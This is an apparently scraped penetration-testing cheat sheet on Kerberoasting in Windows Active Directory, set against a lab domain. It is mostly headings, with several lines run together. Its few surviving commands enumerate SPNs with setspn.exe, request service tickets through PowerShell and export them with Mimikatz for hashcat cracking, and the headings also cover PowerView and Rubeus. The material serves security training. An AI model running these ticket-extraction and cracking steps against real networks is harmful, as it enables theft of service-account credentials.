๐ชWindows - Kerberoasting
setspn.exe
Enumerating SPNs with setspn.exe
setspn.exe -Q */*Targeting a Single User
Add-Type -AssemblyName System.IdentityModelNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"Retrieving All Tickets Using setspn.exe
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }Mimikatz
Extracting Tickets from Memory with Mimikatz
Using 'mimikatz.log' for logfile : OK
mimikatz # base64 /out:true
isBase64InterceptInput is false
isBase64InterceptOutput is true
mimikatz # kerberos::list /export Preparing the Base64 Blob for Cracking
Placing the Output into a File as .kirbi
kirbi2john.py
Extracting the Kerberos Ticket using kirbi2john.py
Hashcat
Modifiying crack_file for Hashcat
Cracking the Hash with Hashcat
hashcat --example-hashes

--user
Powerview
Using PowerView to Extract TGS Tickets
Using PowerView to Target a Specific User
Exporting All Tickets to a CSV File
Rubeus
Using the /stats Flag
Using the /nowrap Flag
Using the /user Flag
Using the /tgtdeleg Flag
Encryption Types
Encryption
Hash Type
msDS-SupportedEncryptionTypes
Decimal Value
Hex Value
Cracking the Ticket with Hashcat & rockyou.txt
Checking Supported Encryption Types
Requesting a New Ticket
Running Hashcat & Checking the Status of the Cracking Job
Edit Encryption Types

Last updated